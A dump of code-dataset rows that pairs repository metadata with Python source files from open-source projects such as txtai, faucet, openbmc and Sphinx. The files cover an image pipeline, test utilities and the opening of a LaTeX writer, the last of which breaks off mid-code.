Dataset columns (type, summary statistics):

- blob_id: string, length 40
- directory_id: string, length 40
- path: string, length 4 to 721
- content_id: string, length 40
- detected_licenses: list, length 0 to 57
- license_type: string, 2 classes
- repo_name: string, length 5 to 91
- snapshot_id: string, length 40
- revision_id: string, length 40
- branch_name: string, 321 classes
- visit_date: timestamp[ns], 2016-08-12 09:31:09 to 2023-09-06 10:45:07
- revision_date: timestamp[ns], 2010-09-28 14:01:40 to 2023-09-06 06:22:19
- committer_date: timestamp[ns], 2010-09-28 14:01:40 to 2023-09-06 06:22:19
- github_id: int64, 426 to 681M
- star_events_count: int64, 101 to 243k
- fork_events_count: int64, 0 to 110k
- gha_license_id: string, 23 classes
- gha_event_created_at: timestamp[ns], 2012-06-28 18:51:49 to 2023-09-14 21:59:16, nullable
- gha_created_at: timestamp[ns], 2008-02-11 22:55:26 to 2023-08-10 11:14:58, nullable
- gha_language: string, 147 classes
- src_encoding: string, 26 classes
- language: string, 2 classes
- is_vendor: bool
- is_generated: bool
- length_bytes: int64, 6 to 10.2M
- extension: string, 115 classes
- filename: string, length 3 to 113
- content: string, length 6 to 10.2M

blob_id: cd686afdf02804445d98cb43a8d0cf1e1e594462
directory_id: b7314f9480634b2f2998c8181d4284d2b52ebba1
path: /src/python/txtai/pipeline/image/objects.py
content_id: 0dbaff4e1d523abdcd43376c4f665360260b635e
detected_licenses: ["Apache-2.0", "LicenseRef-scancode-proprietary-license"]
license_type: permissive
repo_name: neuml/txtai
snapshot_id: 3ca6fba11126d650ea4f2cf5199011a52ea56e4e
revision_id: 789a4555cb60ee9cdfa69afae5a5236d197e2b07
branch_name: refs/heads/master
visit_date: 2023-08-31T08:09:31.834178
revision_date: 2023-08-29T15:36:23
committer_date: 2023-08-29T15:36:23
github_id: 286,301,447
star_events_count: 4,804
fork_events_count: 387
gha_license_id: Apache-2.0
gha_event_created_at: 2023-09-11T17:12:40
gha_created_at: 2020-08-09T19:14:59
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 2,726
extension: py
filename: objects.py
content:
"""
Objects module
"""
# Conditional import
try:
from PIL import Image
PIL = True
except ImportError:
PIL = False
from ..hfpipeline import HFPipeline
class Objects(HFPipeline):
"""
Applies object detection models to images. Supports both object detection models and image classification models.
"""
def __init__(self, path=None, quantize=False, gpu=True, model=None, classification=False, threshold=0.9, **kwargs):
if not PIL:
raise ImportError('Objects pipeline is not available - install "pipeline" extra to enable')
super().__init__("image-classification" if classification else "object-detection", path, quantize, gpu, model, **kwargs)
self.classification = classification
self.threshold = threshold
def __call__(self, images, flatten=False, workers=0):
"""
Applies object detection/image classification models to images. Returns a list of (label, score).
This method supports a single image or a list of images. If the input is an image, the return
type is a 1D list of (label, score). If the input is a list, a 2D list of (label, score) is
returned with a row per image.
Args:
images: image|list
flatten: flatten output to a list of objects
workers: number of concurrent workers to use for processing data, defaults to 0
Returns:
list of (label, score)
"""
# Convert single element to list
values = [images] if not isinstance(images, list) else images
# Open images if file strings
values = [Image.open(image) if isinstance(image, str) else image for image in values]
# Run pipeline
results = (
self.pipeline(values, num_workers=workers)
if self.classification
else self.pipeline(values, threshold=self.threshold, num_workers=workers)
)
# Build list of (id, score)
outputs = []
for result in results:
# Convert to (label, score) tuples
result = [(x["label"], x["score"]) for x in result if x["score"] > self.threshold]
# Sort by score descending
result = sorted(result, key=lambda x: x[1], reverse=True)
# Deduplicate labels
unique = set()
elements = []
for label, score in result:
if label not in unique:
elements.append(label if flatten else (label, score))
unique.add(label)
outputs.append(elements)
# Return single element if single element passed in
return outputs[0] if not isinstance(images, list) else outputs
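A minimal usage sketch for the Objects pipeline above, assuming txtai is installed with the "pipeline" extra; the image paths are placeholders and the default detection model is whatever txtai ships with:

```python
# Hedged example: run the Objects pipeline on one image and on a batch.
from txtai.pipeline import Objects

objects = Objects()                      # default object-detection model
print(objects("street.jpg"))             # [(label, score), ...] for a single image
print(objects(["street.jpg", "cat.jpg"], flatten=True))  # list of labels per image
```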

blob_id: 5148719ae13d5f6e9dd9a53c17ae2462182b5bd8
directory_id: a46ccf3496712f85e92e15bac27b9f9df23436a4
path: /notebooks/_solutions/01-introduction-tabular-data17.py
content_id: 8b87f1f5fa72420335a27742e79f4cf7d062a37a
detected_licenses: ["BSD-3-Clause"]
license_type: permissive
repo_name: jorisvandenbossche/DS-python-geospatial
snapshot_id: a30ef43daa1d8cfd9d5652ab047bd828573bb493
revision_id: cd5d63057a335e0cb157faf12b945ec664da4c10
branch_name: refs/heads/main
visit_date: 2022-11-24T09:55:06.552714
revision_date: 2022-11-20T22:15:50
committer_date: 2022-11-20T22:15:50
github_id: 244,412,214
star_events_count: 134
fork_events_count: 39
gha_license_id: BSD-3-Clause
gha_event_created_at: 2023-09-14T17:10:54
gha_created_at: 2020-03-02T15:57:19
gha_language: Jupyter Notebook
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 63
extension: py
filename: 01-introduction-tabular-data17.py
content:
subset = districts[districts['population'] > 50000]
len(subset)
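The same boolean-mask filter in self-contained form; `districts` is defined earlier in the notebook, so the small DataFrame below is a made-up stand-in:

```python
# Illustrative only: select rows with a boolean mask, then count them.
import pandas as pd

districts = pd.DataFrame({"name": ["A", "B", "C"],
                          "population": [120000, 30000, 75000]})
subset = districts[districts["population"] > 50000]
print(len(subset))  # 2
```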

blob_id: 948e05bbf880513b5e11d17f4965b2b2e6038808
directory_id: c1291ee7d6d2c702090eaa273b608696e050b138
path: /ulmo/lcra/hydromet/__init__.py
content_id: 24b934d1d127fd1c72acd2099ff6c6a292a1b514
detected_licenses: ["BSD-3-Clause"]
license_type: permissive
repo_name: ulmo-dev/ulmo
snapshot_id: bd5c33f18582744df1c56c8dbb6bdea73ced1f40
revision_id: 63371c33550d4c3fe19a02e615f239d3096fd401
branch_name: refs/heads/master
visit_date: 2023-06-09T07:21:44.503674
revision_date: 2023-06-02T20:41:46
committer_date: 2023-06-02T20:41:46
github_id: 1,579,740
star_events_count: 134
fork_events_count: 51
gha_license_id: NOASSERTION
gha_event_created_at: 2023-06-02T20:41:47
gha_created_at: 2011-04-06T23:00:14
gha_language: HTML
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 425
extension: py
filename: __init__.py
content:
"""
LCRA Hydromet Data
~~~~~~~~~~~~~~~~~~
Access to hydrologic and climate data in the Colorado River Basin (Texas)
provided by the `Hydromet`_ web site and web service from
the `Lower Colorado River Authority`_.
.. _Lower Colorado River Authority: http://www.lcra.org
.. _Hydromet: http://hydromet.lcra.org
"""
from .core import get_sites_by_type, get_site_data, get_all_sites, get_current_data
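A hedged usage sketch for the helper re-exported above; the no-argument call is an assumption since the signatures are not shown in this file:

```python
# Hypothetical usage; the call signature is an assumption, check ulmo's documentation.
from ulmo.lcra.hydromet import get_all_sites

sites = get_all_sites()
print(len(sites))
```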

blob_id: a151a964fbcb9179e5d5d2e1b9ad3bd73a538391
directory_id: ac2f43c8e0d9649a7f063c59b3dffdfed9fd7ed7
path: /tests2/common/base_mboot_test.py
content_id: 087f2223f8d336601088230999db83bc57a6a4a7
detected_licenses: []
license_type: no_license
repo_name: facebook/openbmc
snapshot_id: bef10604ced226288600f55248b7f1be9945aea4
revision_id: 32777c66a8410d767eae15baabf71c61a0bef13c
branch_name: refs/heads/helium
visit_date: 2023-08-17T03:13:54.729494
revision_date: 2023-08-16T23:24:18
committer_date: 2023-08-16T23:24:18
github_id: 31,917,712
star_events_count: 684
fork_events_count: 331
gha_license_id: null
gha_event_created_at: 2023-07-25T21:19:08
gha_created_at: 2015-03-09T19:18:35
gha_language: C
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,707
extension: py
filename: base_mboot_test.py
content:
#!/usr/bin/env python3
#
# Copyright 2020-present Facebook. All Rights Reserved.
#
# This program file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program in a file named COPYING; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import json
from abc import abstractmethod
from utils.cit_logger import Logger
from utils.shell_util import run_cmd
class BaseMBootTest(object):
def setUp(self):
Logger.start(name=self._testMethodName)
self.check_list = set()
self.set_check_list()
def tearDown(self):
Logger.info("Finished logging for {}".format(self._testMethodName))
@abstractmethod
def set_check_list(self):
pass
def test_mboot(self):
"""
Test all measures
"""
checked_list = set()
cmd = ["/usr/bin/mboot-check", "-jt"]
measures = json.loads(run_cmd(cmd))
for m in measures:
self.assertNotEqual(m["measure"], "NA")
if m["component"] in self.check_list:
self.assertEqual(m["expect"], m["measure"])
checked_list.add(m["component"])
self.assertEqual(checked_list, self.check_list)
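A sketch of how a platform-specific test might use this base class; mixing in unittest.TestCase (which supplies _testMethodName and the assert helpers used above) and the component names are assumptions, not part of the file:

```python
# Hypothetical concrete subclass; the component names are made up.
import unittest

class ExamplePlatformMBootTest(BaseMBootTest, unittest.TestCase):
    def set_check_list(self):
        # Components whose measured values must equal their expected values.
        self.check_list = {"u-boot", "os"}
```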

blob_id: c49c1c92853ce4ad200d63808ce37dccbec5756f
directory_id: e4f8313d3c91d08e3ab92886a956d96e5a3e21bf
path: /tests/integration/conftest.py
content_id: dc33687e53061d4325b62ef406e7749573021146
detected_licenses: ["MIT"]
license_type: permissive
repo_name: kiwicom/crane
snapshot_id: 69e883b56c2b8c0221fb31c8f98265e929abb73f
revision_id: 7033a7f0a8ebaf5679c87ddde8ef866b23562917
branch_name: refs/heads/master
visit_date: 2023-04-07T06:50:05.801158
revision_date: 2023-04-04T14:49:24
committer_date: 2023-04-04T14:49:24
github_id: 86,802,251
star_events_count: 105
fork_events_count: 17
gha_license_id: MIT
gha_event_created_at: 2022-12-08T04:50:11
gha_created_at: 2017-03-31T09:28:10
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 526
extension: py
filename: conftest.py
content:
import os
import shutil
import git
import pytest
import tempfile
from crane import deployment
@pytest.fixture(autouse=True)
def gitlab_ci_env(monkeypatch):
monkeypatch.setenv("GITLAB_USER_EMAIL", "picky@kiwi.com")
monkeypatch.setenv("CI_PROJECT_PATH", "foo/bar")
monkeypatch.setenv("CI_PROJECT_URL", "https://example.com/foo/bar")
monkeypatch.setenv("CI_JOB_ID", "1234567")
monkeypatch.setenv("CI_REGISTRY_IMAGE", "registry.example.com/foo/bar")
monkeypatch.setenv("CI_ENVIRONMENT_NAME", "a-b/c-d")

blob_id: 31d52dd3fad2395ef5dd897c743258eb9fdbd78e
directory_id: cb8eaa782982767464ac0f9f6fb5c24fc0610c7b
path: /clib/mininet_test_util.py
content_id: c96e989e83a6c601004ac86e0c0238abc3e00b0c
detected_licenses: ["Apache-2.0"]
license_type: permissive
repo_name: faucetsdn/faucet
snapshot_id: 8a62688f369dfecebb23d30f7704799f613323f1
revision_id: 33a111e0664a7ac7d98938f7a0a0222a5c99ca7b
branch_name: refs/heads/main
visit_date: 2023-08-28T19:16:46.435088
revision_date: 2023-08-24T02:04:23
committer_date: 2023-08-24T02:04:23
github_id: 43,105,431
star_events_count: 465
fork_events_count: 158
gha_license_id: Apache-2.0
gha_event_created_at: 2023-09-14T06:51:38
gha_created_at: 2015-09-25T02:39:36
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 7,393
extension: py
filename: mininet_test_util.py
content:
#!/usr/bin/env python3
"""Standalone utility functions for Mininet tests."""
import collections
import os
import socket
import subprocess
import time
# pylint: disable=import-error
from mininet.log import error, output
DEVNULL = open(os.devnull, "wb", encoding=None) # pylint: disable=consider-using-with
GETPORT = "GETPORT"
PUTPORTS = "PUTPORTS"
GETSERIAL = "GETSERIAL"
LISTPORTS = "LISTPORTS"
LOCALHOST = "127.0.0.1"
LOCALHOSTV6 = "::1"
FAUCET_DIR = os.getenv("FAUCET_DIR", "../faucet")
RESERVED_FOR_TESTS_PORTS = (179, 5001, 5002, 6633, 6653)
with open(
"/proc/sys/net/netfilter/nf_conntrack_tcp_timeout_time_wait", encoding="utf-8"
) as pf:
MIN_PORT_AGE = max(int(pf.read()) / 2, 10)
def flat_test_name(_id):
"""Return short form test name from TestCase ID."""
return "-".join(_id.split(".")[1:])
def lsof_tcp_listening_cmd(port, ipv, state, terse, pid):
"""Return a command line for lsof for processes with specified TCP state."""
terse_arg = ""
if terse:
terse_arg = "-t"
pid_arg = ""
if pid:
pid_arg = "-p %u" % pid
return "lsof -b -P -n %s %s -sTCP:%s -i %u -a -i tcp:%u" % (
pid_arg,
terse_arg,
state,
ipv,
port,
)
def lsof_udp_listening_cmd(port, terse):
"""Return a command line for lsof for processes with specified TCP state."""
terse_arg = ""
if terse:
terse_arg = "-t"
return "lsof -b -P -n %s -i udp:%u -a" % (terse_arg, port)
def tcp_listening_cmd(port, ipv=4, state="LISTEN", terse=True, pid=None):
"""Call lsof_tcp_listening_cmd() with default args."""
return lsof_tcp_listening_cmd(port, ipv, state, terse, pid)
def udp_listening_cmd(port, terse=True):
"""Call lsof_tcp_listening_cmd() with default args."""
return lsof_udp_listening_cmd(port, terse)
def mininet_dpid(int_dpid):
"""Return stringified hex version, of int DPID for mininet."""
return str("%x" % int(int_dpid))
def str_int_dpid(str_dpid):
"""Return stringified int version, of int or hex DPID from YAML."""
str_dpid = str(str_dpid)
if str_dpid.startswith("0x"):
return str(int(str_dpid, 16))
return str(int(str_dpid))
def receive_sock_line(sock):
"""Receive a \n terminated line from a socket."""
buf = ""
while buf.find("\n") <= -1:
buf += sock.recv(2**10).decode()
return buf.strip()
def tcp_listening(port):
"""Return True if any process listening on a port."""
return (
subprocess.call(
tcp_listening_cmd(port).split(),
stdin=DEVNULL,
stdout=DEVNULL,
stderr=DEVNULL,
close_fds=True,
)
== 0
)
def udp_listening(port):
"""Return True if any process listening on a port."""
return (
subprocess.call(
udp_listening_cmd(port).split(),
stdin=DEVNULL,
stdout=DEVNULL,
stderr=DEVNULL,
close_fds=True,
)
== 0
)
def test_server_request(ports_socket, name, command):
assert name is not None
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(ports_socket)
sock.sendall(("%s,%s\n" % (command, name)).encode())
output("%s %s\n" % (name, command))
buf = receive_sock_line(sock)
responses = [int(i) for i in buf.split("\n")]
sock.close()
if len(responses) == 1:
responses = responses[0]
output("%s %s: %u\n" % (name, command, responses))
return responses
def get_serialno(ports_socket, name):
"""Retrieve serial number from test server."""
return test_server_request(ports_socket, name, GETSERIAL)
def find_free_port(ports_socket, name):
"""Retrieve a free TCP port from test server."""
request_name = "-".join((name, str(os.getpid())))
while True:
port = test_server_request(ports_socket, request_name, GETPORT)
if not tcp_listening(port):
return port
error("port %u is busy, try another" % port)
def find_free_udp_port(ports_socket, name):
request_name = "-".join((name, str(os.getpid())))
while True:
port = test_server_request(ports_socket, request_name, GETPORT)
if not udp_listening(port):
return port
error("port %u is busy, try another" % port)
def return_free_ports(ports_socket, name):
"""Notify test server that all ports under name are released."""
return test_server_request(ports_socket, name, PUTPORTS)
def serve_ports(ports_socket, start_free_ports, min_free_ports):
"""Implement a TCP server to dispense free TCP ports."""
ports_q = collections.deque()
free_ports = set()
port_age = {}
serialno = 0
def get_port():
while True:
free_socket = socket.socket()
free_socket.bind(("", 0))
free_port = free_socket.getsockname()[1]
free_socket.close()
if free_port < 1024:
continue
if free_port in RESERVED_FOR_TESTS_PORTS:
continue
if free_port in free_ports:
continue
break
free_ports.add(free_port)
port_age[free_port] = time.time()
return free_port
def queue_free_ports(min_queue_size):
while len(ports_q) < min_queue_size:
port = get_port()
ports_q.append(port)
port_age[port] = time.time()
queue_free_ports(start_free_ports)
ports_by_name = collections.defaultdict(set)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(ports_socket)
sock.listen(1)
cold_start = True
while True:
connection, _ = sock.accept()
command, name = receive_sock_line(connection).split(",")
response = None
if command == GETSERIAL:
serialno += 1
response = serialno
elif command == PUTPORTS:
ports_returned = 0
for port in ports_by_name[name]:
ports_returned += 1
ports_q.append(port)
port_age[port] = time.time()
del ports_by_name[name]
response = ports_returned
if ports_returned:
cold_start = False
elif command == GETPORT:
while True:
port = ports_q.popleft()
if time.time() - port_age[port] > MIN_PORT_AGE or cold_start:
break
ports_q.append(port)
time.sleep(1)
ports_by_name[name].add(port)
response = port
queue_free_ports(min_free_ports)
elif command == LISTPORTS:
response = list(ports_by_name[name])
if response is not None:
response_str = ""
if isinstance(response, int):
response = [response]
response_str = "".join(["%u\n" % i for i in response])
connection.sendall(response_str.encode()) # pylint: disable=no-member
connection.close()
def timeout_cmd(cmd, timeout):
"""Return a command line prefaced with a timeout wrappers and stdout/err unbuffered."""
return "timeout -sKILL %us stdbuf -o0 -e0 %s" % (timeout, cmd)
def timeout_soft_cmd(cmd, timeout):
"""Same as timeout_cmd buf using SIGTERM on timeout."""
return "timeout %us stdbuf -o0 -e0 %s" % (timeout, cmd)

blob_id: 74c9202d3f478efedf88fed19a016b6a421714cf
directory_id: 96dcea595e7c16cec07b3f649afd65f3660a0bad
path: /tests/components/universal/__init__.py
content_id: 9a814402b9c3e95e8490df1c07216ca5b947f3c9
detected_licenses: ["Apache-2.0"]
license_type: permissive
repo_name: home-assistant/core
snapshot_id: 3455eac2e9d925c92d30178643b1aaccf3a6484f
revision_id: 80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
branch_name: refs/heads/dev
visit_date: 2023-08-31T15:41:06.299469
revision_date: 2023-08-31T14:50:53
committer_date: 2023-08-31T14:50:53
github_id: 12,888,993
star_events_count: 35,501
fork_events_count: 20,617
gha_license_id: Apache-2.0
gha_event_created_at: 2023-09-14T21:50:15
gha_created_at: 2013-09-17T07:29:48
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 41
extension: py
filename: __init__.py
content:
"""Tests for the universal component."""

blob_id: 210e9e154e203320b8e7a0522df3164e9f6fe03f
directory_id: 8de79ab1818c535dcd8ad6e0c92b5c9642ffb82a
path: /sphinx/writers/latex.py
content_id: 89b349aee59859e624d9a99bfb55f8c194b3f6d9
detected_licenses: ["BSD-3-Clause", "BSD-2-Clause"]
license_type: permissive
repo_name: sphinx-doc/sphinx
snapshot_id: 632d75bfc7bef14904f3d847e6de6d37594a13a5
revision_id: eab54533a56119c5badd5aac647c595a9adae720
branch_name: refs/heads/master
visit_date: 2023-08-16T18:21:54.073511
revision_date: 2023-08-15T17:36:47
committer_date: 2023-08-15T17:36:47
github_id: 28,710,753
star_events_count: 6,138
fork_events_count: 2,587
gha_license_id: NOASSERTION
gha_event_created_at: 2023-09-14T14:22:28
gha_created_at: 2015-01-02T10:53:28
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 90,889
extension: py
filename: latex.py
content:
"""Custom docutils writer for LaTeX.
Much of this code is adapted from Dave Kuhlman's "docpy" writer from his
docutils sandbox.
"""
from __future__ import annotations
import re
from collections import defaultdict
from collections.abc import Iterable
from os import path
from typing import TYPE_CHECKING, Any, cast
from docutils import nodes, writers
from sphinx import addnodes, highlighting
from sphinx.domains.std import StandardDomain
from sphinx.errors import SphinxError
from sphinx.locale import _, __, admonitionlabels
from sphinx.util import logging, texescape
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.index_entries import split_index_msg
from sphinx.util.nodes import clean_astext, get_prev_node
from sphinx.util.template import LaTeXRenderer
from sphinx.util.texescape import tex_replace_map
try:
from docutils.utils.roman import toRoman
except ImportError:
# In Debian/Ubuntu, roman package is provided as roman, not as docutils.utils.roman
from roman import toRoman # type: ignore[no-redef]
if TYPE_CHECKING:
from docutils.nodes import Element, Node, Text
from sphinx.builders.latex import LaTeXBuilder
from sphinx.builders.latex.theming import Theme
from sphinx.domains import IndexEntry
logger = logging.getLogger(__name__)
MAX_CITATION_LABEL_LENGTH = 8
LATEXSECTIONNAMES = ["part", "chapter", "section", "subsection",
"subsubsection", "paragraph", "subparagraph"]
ENUMERATE_LIST_STYLE = defaultdict(lambda: r'\arabic',
{
'arabic': r'\arabic',
'loweralpha': r'\alph',
'upperalpha': r'\Alph',
'lowerroman': r'\roman',
'upperroman': r'\Roman',
})
CR = '\n'
BLANKLINE = '\n\n'
EXTRA_RE = re.compile(r'^(.*\S)\s+\(([^()]*)\)\s*$')
class collected_footnote(nodes.footnote):
"""Footnotes that are collected are assigned this class."""
class UnsupportedError(SphinxError):
category = 'Markup is unsupported in LaTeX'
class LaTeXWriter(writers.Writer):
supported = ('sphinxlatex',)
settings_spec = ('LaTeX writer options', '', (
('Document name', ['--docname'], {'default': ''}),
('Document class', ['--docclass'], {'default': 'manual'}),
('Author', ['--author'], {'default': ''}),
))
settings_defaults: dict[str, Any] = {}
theme: Theme
def __init__(self, builder: LaTeXBuilder) -> None:
super().__init__()
self.builder = builder
def translate(self) -> None:
visitor = self.builder.create_translator(self.document, self.builder, self.theme)
self.document.walkabout(visitor)
self.output = cast(LaTeXTranslator, visitor).astext()
# Helper classes
class Table:
"""A table data"""
def __init__(self, node: Element) -> None:
self.header: list[str] = []
self.body: list[str] = []
self.align = node.get('align', 'default')
self.classes: list[str] = node.get('classes', [])
self.styles: list[str] = []
if 'standard' in self.classes:
self.styles.append('standard')
elif 'borderless' in self.classes:
self.styles.append('borderless')
elif 'booktabs' in self.classes:
self.styles.append('booktabs')
if 'nocolorrows' in self.classes:
self.styles.append('nocolorrows')
elif 'colorrows' in self.classes:
self.styles.append('colorrows')
self.colcount = 0
self.colspec: str = ''
if 'booktabs' in self.styles or 'borderless' in self.styles:
self.colsep: str | None = ''
elif 'standard' in self.styles:
self.colsep = '|'
else:
self.colsep = None
self.colwidths: list[int] = []
self.has_problematic = False
self.has_oldproblematic = False
self.has_verbatim = False
self.caption: list[str] = []
self.stubs: list[int] = []
# current position
self.col = 0
self.row = 0
# A dict mapping a table location to a cell_id (cell = rectangular area)
self.cells: dict[tuple[int, int], int] = defaultdict(int)
self.cell_id = 0 # last assigned cell_id
def is_longtable(self) -> bool:
"""True if and only if table uses longtable environment."""
return self.row > 30 or 'longtable' in self.classes
def get_table_type(self) -> str:
"""Returns the LaTeX environment name for the table.
The class currently supports:
* longtable
* tabular
* tabulary
"""
if self.is_longtable():
return 'longtable'
elif self.has_verbatim:
return 'tabular'
elif self.colspec:
return 'tabulary'
elif self.has_problematic or (self.colwidths and 'colwidths-given' in self.classes):
return 'tabular'
else:
return 'tabulary'
def get_colspec(self) -> str:
"""Returns a column spec of table.
This is what LaTeX calls the 'preamble argument' of the used table environment.
.. note::
The ``\\X`` and ``T`` column type specifiers are defined in
``sphinxlatextables.sty``.
"""
if self.colspec:
return self.colspec
_colsep = self.colsep
assert _colsep is not None
if self.colwidths and 'colwidths-given' in self.classes:
total = sum(self.colwidths)
colspecs = [r'\X{%d}{%d}' % (width, total) for width in self.colwidths]
return f'{{{_colsep}{_colsep.join(colspecs)}{_colsep}}}' + CR
elif self.has_problematic:
return r'{%s*{%d}{\X{1}{%d}%s}}' % (_colsep, self.colcount,
self.colcount, _colsep) + CR
elif self.get_table_type() == 'tabulary':
# sphinx.sty sets T to be J by default.
return '{' + _colsep + (('T' + _colsep) * self.colcount) + '}' + CR
elif self.has_oldproblematic:
return r'{%s*{%d}{\X{1}{%d}%s}}' % (_colsep, self.colcount,
self.colcount, _colsep) + CR
else:
return '{' + _colsep + (('l' + _colsep) * self.colcount) + '}' + CR
def add_cell(self, height: int, width: int) -> None:
"""Adds a new cell to a table.
It will be located at current position: (``self.row``, ``self.col``).
"""
self.cell_id += 1
for col in range(width):
for row in range(height):
assert self.cells[(self.row + row, self.col + col)] == 0
self.cells[(self.row + row, self.col + col)] = self.cell_id
def cell(
self, row: int | None = None, col: int | None = None,
) -> TableCell | None:
"""Returns a cell object (i.e. rectangular area) containing given position.
If no option arguments: ``row`` or ``col`` are given, the current position;
``self.row`` and ``self.col`` are used to get a cell object by default.
"""
try:
if row is None:
row = self.row
if col is None:
col = self.col
return TableCell(self, row, col)
except IndexError:
return None
class TableCell:
"""Data of a cell in a table."""
def __init__(self, table: Table, row: int, col: int) -> None:
if table.cells[(row, col)] == 0:
raise IndexError
self.table = table
self.cell_id = table.cells[(row, col)]
self.row = row
self.col = col
# adjust position for multirow/multicol cell
while table.cells[(self.row - 1, self.col)] == self.cell_id:
self.row -= 1
while table.cells[(self.row, self.col - 1)] == self.cell_id:
self.col -= 1
@property
def width(self) -> int:
"""Returns the cell width."""
width = 0
while self.table.cells[(self.row, self.col + width)] == self.cell_id:
width += 1
return width
@property
def height(self) -> int:
"""Returns the cell height."""
height = 0
while self.table.cells[(self.row + height, self.col)] == self.cell_id:
height += 1
return height
def escape_abbr(text: str) -> str:
"""Adjust spacing after abbreviations."""
return re.sub(r'\.(?=\s|$)', r'.\@', text)
def rstdim_to_latexdim(width_str: str, scale: int = 100) -> str:
"""Convert `width_str` with rst length to LaTeX length."""
match = re.match(r'^(\d*\.?\d*)\s*(\S*)$', width_str)
if not match:
raise ValueError
res = width_str
amount, unit = match.groups()[:2]
if scale == 100:
float(amount) # validate amount is float
if unit in ('', "px"):
res = r"%s\sphinxpxdimen" % amount
elif unit == 'pt':
res = '%sbp' % amount # convert to 'bp'
elif unit == "%":
res = r"%.3f\linewidth" % (float(amount) / 100.0)
else:
amount_float = float(amount) * scale / 100.0
if unit in ('', "px"):
res = r"%.5f\sphinxpxdimen" % amount_float
elif unit == 'pt':
res = '%.5fbp' % amount_float
elif unit == "%":
res = r"%.5f\linewidth" % (amount_float / 100.0)
else:
res = f"{amount_float:.5f}{unit}"
return res
class LaTeXTranslator(SphinxTranslator):
builder: LaTeXBuilder
secnumdepth = 2 # legacy sphinxhowto.cls uses this, whereas article.cls
# default is originally 3. For book/report, 2 is already LaTeX default.
ignore_missing_images = False
def __init__(self, document: nodes.document, builder: LaTeXBuilder,
theme: Theme) -> None:
super().__init__(document, builder)
self.body: list[str] = []
self.theme = theme
# flags
self.in_title = 0
self.in_production_list = 0
self.in_footnote = 0
self.in_caption = 0
self.in_term = 0
self.needs_linetrimming = 0
self.in_minipage = 0
self.no_latex_floats = 0
self.first_document = 1
self.this_is_the_title = 1
self.literal_whitespace = 0
self.in_parsed_literal = 0
self.compact_list = 0
self.first_param = 0
self.in_desc_signature = False
sphinxpkgoptions = []
# sort out some elements
self.elements = self.builder.context.copy()
# initial section names
self.sectionnames = LATEXSECTIONNAMES[:]
if self.theme.toplevel_sectioning == 'section':
self.sectionnames.remove('chapter')
# determine top section level
self.top_sectionlevel = 1
if self.config.latex_toplevel_sectioning:
try:
self.top_sectionlevel = \
self.sectionnames.index(self.config.latex_toplevel_sectioning)
except ValueError:
logger.warning(__('unknown %r toplevel_sectioning for class %r') %
(self.config.latex_toplevel_sectioning, self.theme.docclass))
if self.config.numfig:
self.numfig_secnum_depth = self.config.numfig_secnum_depth
if self.numfig_secnum_depth > 0: # default is 1
# numfig_secnum_depth as passed to sphinx.sty indices same names as in
# LATEXSECTIONNAMES but with -1 for part, 0 for chapter, 1 for section...
if len(self.sectionnames) < len(LATEXSECTIONNAMES) and \
self.top_sectionlevel > 0:
self.numfig_secnum_depth += self.top_sectionlevel
else:
self.numfig_secnum_depth += self.top_sectionlevel - 1
# this (minus one) will serve as minimum to LaTeX's secnumdepth
self.numfig_secnum_depth = min(self.numfig_secnum_depth,
len(LATEXSECTIONNAMES) - 1)
# if passed key value is < 1 LaTeX will act as if 0; see sphinx.sty
sphinxpkgoptions.append('numfigreset=%s' % self.numfig_secnum_depth)
else:
sphinxpkgoptions.append('nonumfigreset')
if self.config.numfig and self.config.math_numfig:
sphinxpkgoptions.append('mathnumfig')
if (self.config.language not in {'en', 'ja'} and
'fncychap' not in self.config.latex_elements):
# use Sonny style if any language specified (except English)
self.elements['fncychap'] = (r'\usepackage[Sonny]{fncychap}' + CR +
r'\ChNameVar{\Large\normalfont\sffamily}' + CR +
r'\ChTitleVar{\Large\normalfont\sffamily}')
self.babel = self.builder.babel
if not self.babel.is_supported_language():
# emit warning if specified language is invalid
# (only emitting, nothing changed to processing)
logger.warning(__('no Babel option known for language %r'),
self.config.language)
minsecnumdepth = self.secnumdepth # 2 from legacy sphinx manual/howto
if self.document.get('tocdepth'):
# reduce tocdepth if `part` or `chapter` is used for top_sectionlevel
# tocdepth = -1: show only parts
# tocdepth = 0: show parts and chapters
# tocdepth = 1: show parts, chapters and sections
# tocdepth = 2: show parts, chapters, sections and subsections
# ...
tocdepth = self.document.get('tocdepth', 999) + self.top_sectionlevel - 2
if len(self.sectionnames) < len(LATEXSECTIONNAMES) and \
self.top_sectionlevel > 0:
tocdepth += 1 # because top_sectionlevel is shifted by -1
if tocdepth > len(LATEXSECTIONNAMES) - 2: # default is 5 <-> subparagraph
logger.warning(__('too large :maxdepth:, ignored.'))
tocdepth = len(LATEXSECTIONNAMES) - 2
self.elements['tocdepth'] = r'\setcounter{tocdepth}{%d}' % tocdepth
minsecnumdepth = max(minsecnumdepth, tocdepth)
if self.config.numfig and (self.config.numfig_secnum_depth > 0):
minsecnumdepth = max(minsecnumdepth, self.numfig_secnum_depth - 1)
if minsecnumdepth > self.secnumdepth:
self.elements['secnumdepth'] = r'\setcounter{secnumdepth}{%d}' %\
minsecnumdepth
contentsname = document.get('contentsname')
if contentsname:
self.elements['contentsname'] = self.babel_renewcommand(r'\contentsname',
contentsname)
if self.elements['maxlistdepth']:
